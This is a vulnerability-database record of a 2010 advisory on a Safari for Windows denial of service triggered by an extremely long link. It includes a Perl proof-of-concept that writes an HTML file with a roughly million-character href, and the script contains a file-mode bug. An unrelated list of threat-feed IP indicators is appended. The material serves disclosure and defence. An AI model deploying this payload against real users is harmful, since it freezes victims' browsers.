{"id": "SECURITYVULNS:DOC:24380", "bulletinFamily": "software", "title": "Fwd: {Lostmon\u0491s Group} Safari for windows Long link DoS", "description": "############################################\r\nSafari for windows Long link DoS\r\nVendor URL:http://www.apple.com/safari/\r\nAdvisore:http://lostmon.blogspot.com/2010/08/safari-for-windows-long-link-dos.html\r\nVendor notified:Yes exploit available: YES\r\n############################################\r\n\r\nSafari is prone vulnerable to Dos with a very long Link...\r\nThis issue is exploitable via web links like <a href="very long URL">\r\nclick here</a> or similar vectors. Safari fails to render the link\r\nand it turn Frozen resulting in a Denial of service condition.\r\n\r\n#################\r\nVersions Tested\r\n#################\r\n\r\nI have tested this issue in win xp sp3 and a windows 7 fully pached.\r\n\r\nWin XP sp3:\r\n\r\nSafari 5.0.X vulnerable\r\nSafari 4.xx vulnerable\r\n\r\nwindows 7 Ultimate:\r\n\r\nSafari 5.0.X vulnerable\r\nSafari 4.xx vulnerable\r\n\r\n############\r\nReferences\r\n############\r\n\r\nDiscovered: 29-07-2010\r\nvendor notify:31-07-2010\r\nVendor Response:\r\nVendor patch:\r\n\r\n####################\r\nProof Of Concept\r\n####################\r\n\r\n#######################################################################\r\n#!/usr/bin/perl\r\n# safari & k-meleon Long "a href" Link DoS\r\n# Author: Lostmon Lords Lostmon@gmail.com http://lostmon.blogspot.com\r\n# Safari 5.0.1 ( 7533,17,8) and prior versions Long link DoS\r\n# generate the file open it with safari wait a seconds\r\n######################################################################\r\n\r\n$archivo = $ARGV[0];\r\nif(!defined($archivo))\r\n{\r\n\r\nprint "Usage: $0 <archivo.html>\n";\r\n\r\n}\r\n\r\n$cabecera = "<html>" . "\n";\r\n$payload = "<a href=\"about:neterror?e=connectionFailure&c=" . "/" x\r\n1028135 . "\">click here if you can :)</a>" . "\n";\r\n$fin = "</html>";\r\n\r\n$datos = $cabecera . $payload . $fin;\r\n\r\nopen(FILE, '<' . $archivo);\r\nprint FILE $datos;\r\nclose(FILE);\r\n\r\nexit;\r\n\r\n################## EOF ######################\r\n\r\n##############\r\nRelated Links\r\n##############\r\n\r\nvendor bugtracker : http://kmeleon.sourceforge.net/bugs/viewbug.php?bugid=1251\r\nPosible related Vuln: https://bugzilla.mozilla.org/show_bug.cgi?id=583474\r\nTest Case : https://bugzilla.mozilla.org/attachment.cgi?id=461776\r\n\r\n###################### \u0402nd #############################\r\n\r\nThnx to Phreak for support and let me undestanding the nature of this bug\r\nthnx to jajoni for test it in windows 7 X64 bits version.\r\n\r\natentamente:\r\nLostmon (lostmon@gmail.com)\r\nWeb-Blog: http://lostmon.blogspot.com/\r\nGoogle group: http://groups.google.com/group/lostmon (new)\r\n--\r\nLa curiosidad es lo que hace mover la mente...", "published": "2010-08-05T00:00:00", "modified": "2010-08-05T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:24380", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:36", "edition": 1, "viewCount": 29, "enchantments": {"score": {"value": 2.2, "vector": "NONE", "modified": "2018-08-31T11:10:36", "rev": 2}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:F3563336B135A1D7C1251AE54FDC6286"]}, {"type": "nessus", "idList": ["EULEROS_SA-2020-1318.NASL", "EULEROS_SA-2020-1323.NASL", "EULEROS_SA-2020-1314.NASL", "DEBIAN_DLA-2164.NASL", "FREEBSD_PKG_40194E1C6D8911EA808280EE73419AF3.NASL", "EULEROS_SA-2020-1299.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562311220201314", "OPENVAS:1361412562311220201299", "OPENVAS:1361412562311220201323", "OPENVAS:1361412562311220201318", "OPENVAS:1361412562310892164"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2164-1:52F3C"]}, {"type": "zdt", "idList": ["1337DAY-ID-34159", "1337DAY-ID-34153", "1337DAY-ID-34157", "1337DAY-ID-34144", "1337DAY-ID-34134"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:10149"]}, {"type": "kitploit", "idList": ["KITPLOIT:1907207623071471216"]}], "modified": "2018-08-31T11:10:36", "rev": 2}, "vulnersScore": 2.2}, "affectedSoftware": []}

{"rst": [{"lastseen": "2020-12-24T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **46[.]246.26.8** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **32**.\n First seen: 2020-12-22T03:00:00, Last seen: 2020-12-24T03:00:00.\n IOC tags: **generic**.\nASN 42708: (First IP 46.246.12.0, Last IP 46.246.127.255).\nASN Name \"PORTLANE\" and Organisation \"wwwportlanecom\".\nASN hosts 24380 domains.\nGEO IP information: City \"Stockholm\", Country \"Sweden\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-22T00:00:00", "id": "RST:318B5AC0-F1C9-36F0-9C4A-848B8850957C", "href": "", "published": "2020-12-25T00:00:00", "title": "RST Threat feed. IOC: 46.246.26.8", "type": "rst", "cvss": {}}, {"lastseen": "2020-12-24T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **188[.]126.89.52** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **32**.\n First seen: 2020-12-22T03:00:00, Last seen: 2020-12-24T03:00:00.\n IOC tags: **generic**.\nASN 42708: (First IP 188.126.64.0, Last IP 188.126.95.255).\nASN Name \"PORTLANE\" and Organisation \"wwwportlanecom\".\nASN hosts 24380 domains.\nGEO IP information: City \"Helsinki\", Country \"Finland\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-22T00:00:00", "id": "RST:675436CA-5D18-3EF3-BBD5-D116BC92C572", "href": "", "published": "2020-12-25T00:00:00", "title": "RST Threat feed. IOC: 188.126.89.52", "type": "rst", "cvss": {}}, {"lastseen": "2020-12-24T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **188[.]126.89.157** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **31**.\n First seen: 2020-12-21T03:00:00, Last seen: 2020-12-24T03:00:00.\n IOC tags: **generic**.\nASN 42708: (First IP 188.126.64.0, Last IP 188.126.95.255).\nASN Name \"PORTLANE\" and Organisation \"wwwportlanecom\".\nASN hosts 24380 domains.\nGEO IP information: City \"Helsinki\", Country \"Finland\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-21T00:00:00", "id": "RST:FA8DE2B6-4F86-3BD7-8146-34A46CE57674", "href": "", "published": "2020-12-25T00:00:00", "title": "RST Threat feed. IOC: 188.126.89.157", "type": "rst", "cvss": {}}, {"lastseen": "2020-12-24T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **194[.]14.85.18** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **28**.\n First seen: 2020-12-15T03:00:00, Last seen: 2020-12-24T03:00:00.\n IOC tags: **generic**.\nASN 42708: (First IP 194.14.85.0, Last IP 194.14.85.255).\nASN Name \"PORTLANE\" and Organisation \"wwwportlanecom\".\nASN hosts 24380 domains.\nGEO IP information: City \"Oslo\", Country \"Norway\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-15T00:00:00", "id": "RST:45D979DA-68DF-396B-8E00-AC8E628E593A", "href": "", "published": "2020-12-25T00:00:00", "title": "RST Threat feed. IOC: 194.14.85.18", "type": "rst", "cvss": {}}, {"lastseen": "2020-12-24T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **188[.]126.94.57** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **32**.\n First seen: 2020-12-22T03:00:00, Last seen: 2020-12-24T03:00:00.\n IOC tags: **generic**.\nASN 42708: (First IP 188.126.64.0, Last IP 188.126.95.255).\nASN Name \"PORTLANE\" and Organisation \"wwwportlanecom\".\nASN hosts 24380 domains.\nGEO IP information: City \"Copenhagen\", Country \"Denmark\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-22T00:00:00", "id": "RST:8456F6B6-6FAB-3739-90D5-0A60EA4AD571", "href": "", "published": "2020-12-25T00:00:00", "title": "RST Threat feed. IOC: 188.126.94.57", "type": "rst", "cvss": {}}, {"lastseen": "2020-12-23T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **46[.]246.4.99** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **31**.\n First seen: 2020-11-25T03:00:00, Last seen: 2020-12-23T03:00:00.\n IOC tags: **malware**.\nASN 42708: (First IP 46.246.2.0, Last IP 46.246.9.255).\nASN Name \"PORTLANE\" and Organisation \"wwwportlanecom\".\nASN hosts 24380 domains.\nGEO IP information: City \"\", Country \"Sweden\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-11-25T00:00:00", "id": "RST:B27B8626-01A9-3BAB-A921-3A9E488E151D", "href": "", "published": "2020-12-24T00:00:00", "title": "RST Threat feed. IOC: 46.246.4.99", "type": "rst", "cvss": {}}, {"lastseen": "2020-12-23T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **31[.]192.228.185** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **2**.\n First seen: 2019-10-13T03:00:00, Last seen: 2020-12-23T03:00:00.\n IOC tags: **generic**.\nASN 42708: (First IP 31.192.228.0, Last IP 31.192.228.255).\nASN Name \"PORTLANE\" and Organisation \"wwwportlanecom\".\nASN hosts 24380 domains.\nGEO IP information: City \"\", Country \"Sweden\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2019-10-13T00:00:00", "id": "RST:B0D1B644-42FF-38A5-8336-F7EA0BE4FF6A", "href": "", "published": "2020-12-24T00:00:00", "title": "RST Threat feed. IOC: 31.192.228.185", "type": "rst", "cvss": {}}, {"lastseen": "2020-12-23T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **188[.]126.81.155** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **2**.\n First seen: 2019-10-13T03:00:00, Last seen: 2020-12-23T03:00:00.\n IOC tags: **generic**.\nASN 42708: (First IP 188.126.64.0, Last IP 188.126.95.255).\nASN Name \"PORTLANE\" and Organisation \"wwwportlanecom\".\nASN hosts 24380 domains.\nGEO IP information: City \"\", Country \"Sweden\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2019-10-13T00:00:00", "id": "RST:44EA24E2-45EB-3B9C-B2D3-5D07B7086AD2", "href": "", "published": "2020-12-24T00:00:00", "title": "RST Threat feed. IOC: 188.126.81.155", "type": "rst", "cvss": {}}, {"lastseen": "2020-12-22T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **188[.]126.89.57** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **43**.\n First seen: 2020-12-16T03:00:00, Last seen: 2020-12-22T03:00:00.\n IOC tags: **shellprobe**.\nASN 42708: (First IP 188.126.64.0, Last IP 188.126.95.255).\nASN Name \"PORTLANE\" and Organisation \"wwwportlanecom\".\nASN hosts 24380 domains.\nGEO IP information: City \"Helsinki\", Country \"Finland\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-16T00:00:00", "id": "RST:2693CD89-1912-3129-B944-F1AB7F68465C", "href": "", "published": "2020-12-23T00:00:00", "title": "RST Threat feed. IOC: 188.126.89.57", "type": "rst", "cvss": {}}, {"lastseen": "2020-12-22T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **195[.]246.120.75** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **13**.\n First seen: 2020-09-06T03:00:00, Last seen: 2020-12-22T03:00:00.\n IOC tags: **shellprobe**.\nASN 42708: (First IP 195.246.120.0, Last IP 195.246.121.255).\nASN Name \"PORTLANE\" and Organisation \"wwwportlanecom\".\nASN hosts 24380 domains.\nGEO IP information: City \"\", Country \"Sweden\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-09-06T00:00:00", "id": "RST:CD9E973F-77AC-366F-86A4-0F90BC206339", "href": "", "published": "2020-12-23T00:00:00", "title": "RST Threat feed. IOC: 195.246.120.75", "type": "rst", "cvss": {}}]}